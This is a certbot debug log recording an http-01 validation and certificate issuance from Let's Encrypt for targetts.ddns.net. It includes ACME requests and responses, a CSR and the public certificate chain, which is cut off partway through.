https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632574996616: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSlJUSnJvV3pxVTlHQl9HczZ0YzJzc1RTOWxyTUlxTjZRUGROSkxqbG5RWlEiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTc0OTk2NjE2In0", + "signature": "S18NnIl6jr6BWhprNuorB4wO_wQ_p_z92yRuAu8sVNxwpIK4fvPJTi_EBM_l9XGQ_B4sRNS4WF2-dmkR9kjFhhTlskMRaF9TlD3z-oCAgXSWUOlb5Mehr7AOwzgNm3E23JFhZMJDDqwQSUa17wk5liGBAIbscyrvYx8Wkzw442sXBOn7jfmAYfDT62vV85wwidlAxl2n5OblsTrLRn3baUkkMHmGjyZGlpHrV9vgTxFvglogPk77rOWG6tx4HYNx9GOuniUaBHInKYbDpVyZPreJrYNFVklF2XhcFY7WPJ5wwzGyamg8XyT4N_nN3DmyHyg49rxOdPPWSOKHVgVNuw", + "payload": "" +} +2025-12-25 00:05:40,618:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632574996616 HTTP/1.1" 200 825 +2025-12-25 00:05:40,619:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:05:40 GMT +Content-Type: application/json +Content-Length: 825 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJrq_bdyaMK8AFV7kCdIT5mH6NOtzklv8_mdbuRtWfkkc +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "targetts.ddns.net" + }, + "status": "pending", + "expires": "2026-01-01T00:05:40Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632574996616/3QI9bA", + "status": "pending", + "token": "Carv4gXM7xQ1uEibrPALL9r4ZqEIkoF90yNqLoGk3jk" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632574996616/Dmrcbw", + "status": "pending", + "token": "Carv4gXM7xQ1uEibrPALL9r4ZqEIkoF90yNqLoGk3jk" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632574996616/zijEvA", + "status": "pending", + "token": "Carv4gXM7xQ1uEibrPALL9r4ZqEIkoF90yNqLoGk3jk" + } + ] +} +2025-12-25 00:05:40,619:DEBUG:acme.client:Storing nonce: fULB7aUJrq_bdyaMK8AFV7kCdIT5mH6NOtzklv8_mdbuRtWfkkc +2025-12-25 00:05:40,620:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632574996616/zijEvA', 'status': 'pending', 'token': 'Carv4gXM7xQ1uEibrPALL9r4ZqEIkoF90yNqLoGk3jk'} +2025-12-25 00:05:40,621:INFO:certbot._internal.auth_handler:Performing the following challenges: +2025-12-25 00:05:40,621:INFO:certbot._internal.auth_handler:http-01 challenge for targetts.ddns.net +2025-12-25 00:05:40,621:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains. +2025-12-25 00:05:40,622:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge +2025-12-25 00:05:40,624:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/Carv4gXM7xQ1uEibrPALL9r4ZqEIkoF90yNqLoGk3jk +2025-12-25 00:05:40,625:DEBUG:acme.client:JWS payload: +b'{}' +2025-12-25 00:05:40,628:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632574996616/Dmrcbw: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSnJxX2JkeWFNSzhBRlY3a0NkSVQ1bUg2Tk90emtsdjhfbWRidVJ0V2Zra2MiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzI5MDY0MzgxNzYvNjMyNTc0OTk2NjE2L0RtcmNidyJ9", + "signature": "RMSqADoOYQj-G5xF806VY2-p9A0g0XKCAxE758rjYnDwaZlGgvRyky3QvWoV-ZkVKq8j1T-FtYn77i7Iim5BcFfqermSPBSpsPWtJm6hWlMUuPZjG-_1rZJSpgajg57gNlw8MZ6JDBFOPnX_VxFZE5er_K9H8vErWXmXe-La8wfGmxfB-6x_4mt5v9lPJEzHLyEvj2DhRj4aI4ly3wJt9CRpxrhNSQMzVZ7NAO5SKUZs3tvwyfYN91pSawXb2MVOP28TCK0G4tPgQbYIW2twPJWHIRi-_huQJ2RjVLBjtqwJniP668wk_3_iXYIHnQExkrL_CmJ5oXg-v5gnspmJZw", + "payload": "e30" +} +2025-12-25 00:05:40,787:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/2906438176/632574996616/Dmrcbw HTTP/1.1" 200 195 +2025-12-25 00:05:40,788:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:05:40 GMT +Content-Type: application/json +Content-Length: 195 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="up" +Location: https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632574996616/Dmrcbw +Replay-Nonce: fULB7aUJpgxwCzTDI7q654TVOMhrwkhyJ9p9wL5uQFOo3qN-rks +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632574996616/Dmrcbw", + "status": "pending", + "token": "Carv4gXM7xQ1uEibrPALL9r4ZqEIkoF90yNqLoGk3jk" +} +2025-12-25 00:05:40,788:DEBUG:acme.client:Storing nonce: fULB7aUJpgxwCzTDI7q654TVOMhrwkhyJ9p9wL5uQFOo3qN-rks +2025-12-25 00:05:40,789:INFO:certbot._internal.auth_handler:Waiting for verification... +2025-12-25 00:05:41,789:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 00:05:41,793:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632574996616: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSnBneHdDelRESTdxNjU0VFZPTWhyd2toeUo5cDl3TDV1UUZPbzNxTi1ya3MiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTc0OTk2NjE2In0", + "signature": "RxKLoUui9vvW6Up4nFEhJM6AJyeIpfQrNHJL5Kg_TrGsJEr2K1-CwDs7ghO72PwvhDbdwe8ys4juzKusBykZ1buBXZ3RI7YSsNyAcbtprX9k25yGyKenzaaOun4cfu3pIGE6mKFDIEZ0sxpBQWyhomSXX1qsZNiZ3P2nZkFU4lJQ_sFdwl_gTwdryIcJKfZOAP3syiLFESFGXxUGiFcqypl3UJSLCFdWH1x9rZIkg1kIsW-5P5i1cN-RVscYitmjEtfQILLwbGfuhXo6uMKTCtphbtOoygWeR18iIz7Mvcy66udY-as9GHREk7sR_9UxKgDLiYj65VA--VQqV7tmSw", + "payload": "" +} +2025-12-25 00:05:41,950:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632574996616 HTTP/1.1" 200 825 +2025-12-25 00:05:41,951:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:05:41 GMT +Content-Type: application/json +Content-Length: 825 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjENazP6tKsSkXT5TXH3oFwp-wXCM73M5PPRqbZzrT4Hgo +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "targetts.ddns.net" + }, + "status": "pending", + "expires": "2026-01-01T00:05:40Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632574996616/zijEvA", + "status": "pending", + "token": "Carv4gXM7xQ1uEibrPALL9r4ZqEIkoF90yNqLoGk3jk" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632574996616/3QI9bA", + "status": "pending", + "token": "Carv4gXM7xQ1uEibrPALL9r4ZqEIkoF90yNqLoGk3jk" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632574996616/Dmrcbw", + "status": "pending", + "token": "Carv4gXM7xQ1uEibrPALL9r4ZqEIkoF90yNqLoGk3jk" + } + ] +} +2025-12-25 00:05:41,951:DEBUG:acme.client:Storing nonce: 58tS3qjENazP6tKsSkXT5TXH3oFwp-wXCM73M5PPRqbZzrT4Hgo +2025-12-25 00:05:41,951:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632574996616/zijEvA', 'status': 'pending', 'token': 'Carv4gXM7xQ1uEibrPALL9r4ZqEIkoF90yNqLoGk3jk'} +2025-12-25 00:05:44,953:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 00:05:44,956:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632574996616: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRU5helA2dEtzU2tYVDVUWEgzb0Z3cC13WENNNzNNNVBQUnFiWnpyVDRIZ28iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTc0OTk2NjE2In0", + "signature": "fUjYjPZTnD3C4R0al-MUaWthvU3yLBpHJRyB0OlYRM8Sjiy0ee2pDReNa_s9hvHgT0XNUMsxDrkxIe8MoF3mmvDC9K7F5bTsuGSR4OORpp9reMDQDizhsALCE7ilL9vMwskY8rmsfYnuh5Z2KRO72ZSlHZWrp9QAkNmqcZD5HHxqM0baI6Y8RADv1nAQRtS2Yq52EvPQ4nGw1GyFDqfuUrf-dcMDyf60QA3-pLqCS1awWuyJuT-UYRbVHdKjqAh6IFQWHObECAz8P6HfuhGfWJdF6IASL-bKmLk25fObFR1kNw1UEvDjAfxhyv9NMbn3vcWXjf0__xtQgPnZbEOuXQ", + "payload": "" +} +2025-12-25 00:05:45,113:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632574996616 HTTP/1.1" 200 776 +2025-12-25 00:05:45,113:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:05:45 GMT +Content-Type: application/json +Content-Length: 776 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEi309dR45Zo9VcU81xwJl502LIbN0SL_Hjo8Y7InwJeo +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "targetts.ddns.net" + }, + "status": "valid", + "expires": "2026-01-24T00:05:42Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632574996616/Dmrcbw", + "status": "valid", + "validated": "2025-12-25T00:05:40Z", + "token": "Carv4gXM7xQ1uEibrPALL9r4ZqEIkoF90yNqLoGk3jk", + "validationRecord": [ + { + "url": "http://targetts.ddns.net/.well-known/acme-challenge/Carv4gXM7xQ1uEibrPALL9r4ZqEIkoF90yNqLoGk3jk", + "hostname": "targetts.ddns.net", + "port": "80", + "addressesResolved": [ + "92.249.165.228" + ], + "addressUsed": "92.249.165.228" + } + ] + } + ] +} +2025-12-25 00:05:45,114:DEBUG:acme.client:Storing nonce: 58tS3qjEi309dR45Zo9VcU81xwJl502LIbN0SL_Hjo8Y7InwJeo +2025-12-25 00:05:45,115:DEBUG:certbot._internal.error_handler:Calling registered functions +2025-12-25 00:05:45,115:INFO:certbot._internal.auth_handler:Cleaning up challenges +2025-12-25 00:05:45,115:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/Carv4gXM7xQ1uEibrPALL9r4ZqEIkoF90yNqLoGk3jk +2025-12-25 00:05:45,116:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up +2025-12-25 00:05:45,116:DEBUG:certbot._internal.client:CSR: CSR(file=None, data=b'-----BEGIN CERTIFICATE REQUEST-----\nMIIBJzCBrgIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEbppnNJdjc0qzZonc\n4aanqDlpEFG9XWU1L2OvCFZb9urxaNcrMLvEqXtBbAgTn0I1DlACppHvUm/0OK98\nnOUwEG4XbuerQJkb7VzQ8Gdkkqnon9YKwFsTQl2Ov/3cmu7loC8wLQYJKoZIhvcN\nAQkOMSAwHjAcBgNVHREEFTATghF0YXJnZXR0cy5kZG5zLm5ldDAKBggqhkjOPQQD\nAgNoADBlAjEAiE6jSrKJEoSp9qUhd/qQwTFB7by+8G6sG0IUl95XCI1/I/CjRmsI\n6lzC+m272pNIAjB6eqryBjKrBKKKUvsDL0qVoXdtTLbtGnPBrRfF4A4F+KG/jFN7\nWkzN/7lpd9zNimo=\n-----END CERTIFICATE REQUEST-----\n', form='pem') +2025-12-25 00:05:45,117:DEBUG:certbot._internal.client:Will poll for certificate issuance until 2025-12-25 00:07:15.117467 +2025-12-25 00:05:45,118:DEBUG:acme.client:JWS payload: +b'{\n "csr": "MIIBJzCBrgIBADAAMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEbppnNJdjc0qzZonc4aanqDlpEFG9XWU1L2OvCFZb9urxaNcrMLvEqXtBbAgTn0I1DlACppHvUm_0OK98nOUwEG4XbuerQJkb7VzQ8Gdkkqnon9YKwFsTQl2Ov_3cmu7loC8wLQYJKoZIhvcNAQkOMSAwHjAcBgNVHREEFTATghF0YXJnZXR0cy5kZG5zLm5ldDAKBggqhkjOPQQDAgNoADBlAjEAiE6jSrKJEoSp9qUhd_qQwTFB7by-8G6sG0IUl95XCI1_I_CjRmsI6lzC-m272pNIAjB6eqryBjKrBKKKUvsDL0qVoXdtTLbtGnPBrRfF4A4F-KG_jFN7WkzN_7lpd9zNimo"\n}' +2025-12-25 00:05:45,122:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462365093426: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICI1OHRTM3FqRWkzMDlkUjQ1Wm85VmNVODF4d0psNTAyTEliTjBTTF9Iam84WTdJbndKZW8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2ZpbmFsaXplLzI5MDY0MzgxNzYvNDYyMzY1MDkzNDI2In0", + "signature": "gqcxNzOZ1OHoamHkU7lLli3V46z65ceeeHN2m5Qf_mUfU_YIGDwTpdA33Kl0eshQSO_0bo3ZoAv6CYFV9G8q1i3ltp7kb6eWRQCocwRuLKwZPCoVeeg4hWyeMHxzBAYYUcRX1IUy1igosZ_D7Ddye_u3Nqv-AGTCFDjGxR7M2T7aiLU_vOR1WX1E7f91qaz61Gr_fPCXSrpfi1Zf-2HXCaHEK1qdN1fg6K2XAVdL4ne5Gz4MCWrfRxD5dYG9H776l8L3MdZcnCwTz5C-1_Q5kU4OtgHbE0UcZ14Oxf2RtOG5BB7nauaCAb6_KjkD6fbQELx16egQkTeRsS_RFml0GA", + "payload": "ewogICJjc3IiOiAiTUlJQkp6Q0JyZ0lCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFYnBwbk5KZGpjMHF6Wm9uYzRhYW5xRGxwRUZHOVhXVTFMMk92Q0ZaYjl1cnhhTmNyTUx2RXFYdEJiQWdUbjBJMURsQUNwcEh2VW1fME9LOThuT1V3RUc0WGJ1ZXJRSmtiN1Z6UThHZGtrcW5vbjlZS3dGc1RRbDJPdl8zY211N2xvQzh3TFFZSktvWklodmNOQVFrT01TQXdIakFjQmdOVkhSRUVGVEFUZ2hGMFlYSm5aWFIwY3k1a1pHNXpMbTVsZERBS0JnZ3Foa2pPUFFRREFnTm9BREJsQWpFQWlFNmpTcktKRW9TcDlxVWhkX3FRd1RGQjdieS04RzZzRzBJVWw5NVhDSTFfSV9DalJtc0k2bHpDLW0yNzJwTklBakI2ZXFyeUJqS3JCS0tLVXZzREwwcVZvWGR0VExidEduUEJyUmZGNEE0Ri1LR19qRk43V2t6Tl83bHBkOXpOaW1vIgp9" +} +2025-12-25 00:05:45,521:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/2906438176/462365093426 HTTP/1.1" 200 453 +2025-12-25 00:05:45,522:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:05:45 GMT +Content-Type: application/json +Content-Length: 453 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462365093426 +Replay-Nonce: fULB7aUJYstFBqA3aWs9mxw6uEASi-HKE4wo1eyBVGZ47l5NCYI +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "valid", + "expires": "2026-01-01T00:05:40Z", + "identifiers": [ + { + "type": "dns", + "value": "targetts.ddns.net" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632574996616" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462365093426", + "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/0567c4e1e52bc596eee80511ff65c7045231" +} +2025-12-25 00:05:45,522:DEBUG:acme.client:Storing nonce: fULB7aUJYstFBqA3aWs9mxw6uEASi-HKE4wo1eyBVGZ47l5NCYI +2025-12-25 00:05:46,523:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 00:05:46,526:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462365093426: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSllzdEZCcUEzYVdzOW14dzZ1RUFTaS1IS0U0d28xZXlCVkdaNDdsNU5DWUkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzI5MDY0MzgxNzYvNDYyMzY1MDkzNDI2In0", + "signature": "XbuxzdlIgBMXCZvbcdBuBMQBN-jJHncxUZ2CoZ717odE6kmY3VMP_mQgRbuj1Jn0NK9Nq9uIdyZedECq6ObbjuTfOB56EbsdAIAQGq1Oq-tcscxVT0p2jtGpxPjlFzQNe1vi4P6ruuM086v7RGnBIuzKNQdg0N6qMKf99vvOzW0CP8s0hE88fn7GOzAypahCKMtEA4eLGHT5kQZPDQJskUs1U364zRDEI-8hu1Ghm6nTbD4HhgBzuWh0rO12Z-5mgaPo_spK4jAfn7RrgHcCgdWaQ_d4BPTBYR12i_RcCvPeioAGMoiaztYOMfYqQvwv81iQ9eD8Iu0S7YPEmrmEwg", + "payload": "" +} +2025-12-25 00:05:46,682:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/2906438176/462365093426 HTTP/1.1" 200 453 +2025-12-25 00:05:46,683:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:05:46 GMT +Content-Type: application/json +Content-Length: 453 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/462365093426 +Replay-Nonce: fULB7aUJdBPo4kx1naK2jz7Q9PLGXF0GK4j8ZhXV1lw_vSx_fS0 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "valid", + "expires": "2026-01-01T00:05:40Z", + "identifiers": [ + { + "type": "dns", + "value": "targetts.ddns.net" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632574996616" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/462365093426", + "certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/0567c4e1e52bc596eee80511ff65c7045231" +} +2025-12-25 00:05:46,683:DEBUG:acme.client:Storing nonce: fULB7aUJdBPo4kx1naK2jz7Q9PLGXF0GK4j8ZhXV1lw_vSx_fS0 +2025-12-25 00:05:46,684:DEBUG:acme.client:JWS payload: +b'' +2025-12-25 00:05:46,686:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/0567c4e1e52bc596eee80511ff65c7045231: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSmRCUG80a3gxbmFLMmp6N1E5UExHWEYwR0s0ajhaaFhWMWx3X3ZTeF9mUzAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDU2N2M0ZTFlNTJiYzU5NmVlZTgwNTExZmY2NWM3MDQ1MjMxIn0", + "signature": "LXpZ_1sqYbqZEV6AozikwESZB_nO61rzrG51UGk7z8-Pg7NfVRgGDd9aINDaldGmjN7EaQ9yH1yiNv5JRxuAkV8lPwt4_GCX1FjuTnZ65JTYwz8lusZJWTj5ddiOB9mA_-yKpf6SHkeI1b6dr_APYg96eeOHIdEX-E7T-q5Kqpx3NEeNG_BewDsmc9bCozDIyFQmSJpqbESaAfvGxRpjjjrhzY6i3yMbQuIiy6cqn3q7ToDXRrrKIsMy_vS-I1lXKD0IGlHZawF0kDc_Fnons5pIlhdX31ZwWpo-g-bAE6F1Q1K2jY2A5m1ZgCFj5HCsIEM_4wybQqfl1ZqgPeRljQ", + "payload": "" +} +2025-12-25 00:05:46,842:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/0567c4e1e52bc596eee80511ff65c7045231 HTTP/1.1" 200 2905 +2025-12-25 00:05:46,842:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Thu, 25 Dec 2025 00:05:46 GMT +Content-Type: application/pem-certificate-chain +Content-Length: 2905 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="alternate" +Replay-Nonce: fULB7aUJqPXGzW7nm6lsQI3Jc4GNvLKmO1ncqi3gwCx5-kBvX4A +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +-----BEGIN CERTIFICATE----- +MIIDrjCCAzSgAwIBAgISBWfE4eUrxZbu6AUR/2XHBFIxMAoGCCqGSM49BAMDMDIx +CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF +NzAeFw0yNTEyMjQyMzA3MTVaFw0yNjAzMjQyMzA3MTRaMBwxGjAYBgNVBAMTEXRh +cmdldHRzLmRkbnMubmV0MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEbppnNJdjc0qz +Zonc4aanqDlpEFG9XWU1L2OvCFZb9urxaNcrMLvEqXtBbAgTn0I1DlACppHvUm/0 +OK98nOUwEG4XbuerQJkb7VzQ8Gdkkqnon9YKwFsTQl2Ov/3cmu7lo4ICITCCAh0w +DgYDVR0PAQH/BAQDAgeAMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAM +BgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRkdzIL9Mu+mUplt6f4Z/80MuokEzAfBgNV +HSMEGDAWgBSuSJ7chx1EoG/aouVgdAR4wpwAgDAyBggrBgEFBQcBAQQmMCQwIgYI +KwYBBQUHMAKGFmh0dHA6Ly9lNy5pLmxlbmNyLm9yZy8wHAYDVR0RBBUwE4IRdGFy +Z2V0dHMuZGRucy5uZXQwEwYDVR0gBAwwCjAIBgZngQwBAgEwLQYDVR0fBCYwJDAi +oCCgHoYcaHR0cDovL2U3LmMubGVuY3Iub3JnLzUwLmNybDCCAQYGCisGAQQB1nkC +BAIEgfcEgfQA8gB3AEmcm2neHXzs/DbezYdkprhbrwqHgBnRVVL76esp3fjDAAAB +m1LTaKoAAAQDAEgwRgIhAI5q4PGH60OWaibalUHGm6EmlCqGgfOjn15nmKVQ37d4 +AiEAsS5aR/xBEfhiUbMCucTvsl3QLAOid+tI/z7tB5vq4pwAdwAOV5S8866pPjMb +LJkHs/eQ35vCPXEyJd0hqSWsYcVOIQAAAZtS02ifAAAEAwBIMEYCIQCsYfvhJlQv +vx3eVCerHw1Z6i39EZv0HSWmhZqhq1nTCQIhAPNsGeu51jzNdtuTSk0RIg6FePgZ +s6YURXF48dAU8/wOMAoGCCqGSM49BAMDA2gAMGUCMCYreQlbzELe4OdBK6u3Wgg9 +jLKm4gAVdQ9xgWMHPFPMYcUf5vekGpiYFvU6pKNcGAIxAKtMZqdaO0fB4NeyaMIx +YiTf4CNdcIom03b/PLO3EWx6/FMfLNlJBO4DJ0pjMIcWrQ== +-----END CERTIFICATE----- + +-----BEGIN CERTIFICATE----- +MIIEVzCCAj+gAwIBAgIRAKp18eYrjwoiCWbTi7/UuqEwDQYJKoZIhvcNAQELBQAw +TzELMAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2Vh +cmNoIEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDEwHhcNMjQwMzEzMDAwMDAw +WhcNMjcwMzEyMjM1OTU5WjAyMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3Mg +RW5jcnlwdDELMAkGA1UEAxMCRTcwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARB6AST +CFh/vjcwDMCgQer+VtqEkz7JANurZxLP+U9TCeioL6sp5Z8VRvRbYk4P1INBmbef +QHJFHCxcSjKmwtvGBWpl/9ra8HW0QDsUaJW2qOJqceJ0ZVFT3hbUHifBM/2jgfgw +gfUwDgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD +ATASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBSuSJ7chx1EoG/aouVgdAR4 +wpwAgDAfBgNVHSMEGDAWgBR5tFnme7bl5AFzgAiIyBpY9umbbjAyBggrBgEFBQcB +AQQmMCQwIgYIKwYBBQUHMAKGFmh0dHA6Ly94MS5pLmxlbmNyLm9yZy8wEwYDVR0g +BAwwCjAIBgZngQwBAgEwJwYDVR0fBCAwHjAcoBqgGIYWaHR0cDovL3gxLmMubGVu +Y3Iub3JnLzANBgkqhkiG9w0BAQsFAAOCAgEAjx66fDdLk5ywFn3CzA1w1qfylHUD +aEf0QZpXcJseddJGSfbUUOvbNR9N/QQ16K1lXl4VFyhmGXDT5Kdfcr0RvIIVrNxF +h4lqHtRRCP6RBRstqbZ2zURgqakn/Xip0iaQL0IdfHBZr396FgknniRYFckKORPG +yM3QKnd66gtMst8I5nkRQlAg/Jb+Gc3egIvuGKWboE1G89NTsN9LTDD3PLj0dUMr +OIuqVjLB8pEC6yk9enrlrqjXQgkLEYhXzq7dLafv5Vkig6Gl0nuuqjqfp0Q1bi1o +yVNAlXe6aUXw92CcghC9bNsKEO1+M52YY5+ofIXlS/SEQbvVYYBLZ5yeiglV6t3S +M6H+vTG0aP9YHzLn/KVOHzGQfXDP7qM5tkf+7diZe7o2fw6O7IvN6fsQXEQQj8TJ +UXJxv2/uJhcuy/tSDgXwHM8Uk34WNbRT7zGTGkQRX0gsbjAea/jYAoWv0ZvQRwpq 